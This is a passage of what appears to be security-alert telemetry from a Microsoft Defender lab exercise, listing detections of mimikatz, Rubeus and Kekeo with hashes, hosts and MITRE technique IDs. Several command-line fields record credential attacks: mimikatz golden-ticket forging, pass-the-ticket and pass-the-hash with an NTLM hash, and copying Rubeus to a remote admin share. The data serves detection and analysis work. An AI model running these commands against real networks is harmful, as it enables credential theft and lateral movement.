"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Remediated",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Remediated",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.4",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:03:41.55Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'",
"processCreationTime": "2022-11-21T02:01:28.4753286Z",
"processId": 11068,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:08:38Z",
"fileName": "Rubeus.exe",
"filePath": "\\\\msdxv2-win10b\\C$\\Temp",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:08:38Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\system32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:05:31.04716Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 5688,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:05:31.613543Z",
"processId": 796,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:08:38Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Clean"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:31.8166667Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:11:27.8289307Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3412,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:11:28.3923877Z",
"processId": 12152,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:17:09.9Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:13:46.8940628Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 10192,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:13:47.5091632Z",
"processId": 7072,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:19:20.8Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\system32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:15:44.2072512Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3224,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:15:44.6969091Z",
"processId": 7532,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:24:47.3333333Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:22:01.0244855Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 2044,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:22:01.6460949Z",
"processId": 6948,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:25:58.73Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:23:51.2792242Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 9032,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:23:51.9676129Z",
"processId": 9316,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:32:43.4466667Z",
"fileName": "xcopy.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:30:58.5200922Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 3824,
"processCommandLine": "\"xcopy.exe\" C:\\M365DAttack\\Rubeus\\Rubeus.exe \\\\msdxv2-win10b\\C$\\Temp",
"processCreationTime": "2022-11-21T02:30:59.114679Z",
"processId": 5996,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "a2d8e1a994cb7d774da09896cbb275238268b085",
"sha256": "1c58e29c25b4065893dd4fbb6ed27bd8a04828a30396d581d7c641d21e910dc8",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-22T08:48:30.2433333Z
|
Suspicious
|
None
|
operator
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:03:41.86Z
|
Suspicious
|
None
|
jeff
|
malicious.io
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963592774141_-165641504
|
2bb9ed0d-f18e-46c1-a2e9-72b2a1f7758a
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:59:19.2774369Z
|
2022-12-22T08:59:19.8966667Z
| null |
2022-12-22T08:47:53.1304775Z
|
2022-12-22T08:47:53.1304775Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
| null | null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:19.3466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:59:19.3466667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::ptt C:\\M365DAttack\\Admin-Tickets\" exit",
"processCreationTime": "2022-12-22T08:47:53.1208546Z",
"processId": 10684,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-19T02:13:50.93Z
|
Benign
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:10:52.3466667Z
|
Unknown
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 9,728
|
"mimikatz.exe" privilege::debug "kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt: /user:Steve /ticket:C:\M365DAttack\Admin-Tickets\ticket.kirbi /ptt" exit
|
2022-11-18T05:09:59.3725807Z
| 4,976
|
2022-11-18T05:04:12.7150402Z
|
powershell.exe
|
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:44:34.4Z
|
Suspicious
|
None
|
analyst
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 17,708
|
"mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:WORKGROUP /run:\"powershell.exe C:\M365DAttack\Get-KRBTicket.ps1\"" exit -Wait
|
2022-11-18T04:38:53.2409808Z
| 14,616
|
2022-11-14T04:36:16.5242809Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
da638043457018415165_838353256
|
fe770d07-91ef-4e10-b08a-10d4205d2c4d
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:21:41.8415367Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:10:33.6065838Z
|
2022-11-18T05:17:42.023405Z
|
'Kekeo' malware was detected
|
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Malware
|
Resolved
|
Informational
| 49
|
PendingApproval
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAv
|
d60f5b90-ecd8-4d77-8186-a801597ec762
|
takeshi@msdxv2.m365dpoc.com
| null |
Kekeo
|
[] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:21:41.8866667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\Temp",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:28:58.53Z",
"fileName": "rubeus.exe",
"filePath": "c:\\$recycle.bin\\s-1-5-21-2300221942-1987151257-321556088-1107\\$re1c3b5",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-22T09:02:48.4133333Z
|
Suspicious
|
None
|
root
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T04:44:38.9333333Z
|
Suspicious
|
None
|
hacker
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:57:32.0833333Z
|
Suspicious
|
None
|
admin
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 4,216
|
PSEXESVC.exe
|
2022-12-22T08:47:50.8661147Z
| 748
|
2022-12-22T08:38:52.5569028Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
4f111b3b2366eacdcc66d7ad73548fff9b039c15
|
da638072958901178850_854105446
|
766741b8-ab80-4e7f-93ef-f784f118ab27
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:51:30.1179047Z
|
2022-12-22T08:59:22.7233333Z
| null |
2022-12-22T08:26:21.6761079Z
|
2022-12-22T08:47:34.3612687Z
|
'Kekeo' malware was detected during lateral movement
|
'DefenderObservation.ThreatFamily' malware was detected on this device. An attacker might be attempting to move laterally to this device from another device on the network.
|
LateralMovement
|
New
|
Medium
| 61
|
PendingApproval
| null | null |
WindowsDefenderAtp
|
7a6f0432-57d7-4a96-a286-0bd733ea425d
| null | null | null |
[
"T1021.001",
"T1078"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "MSDXV8-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": "Rubeus.exe",
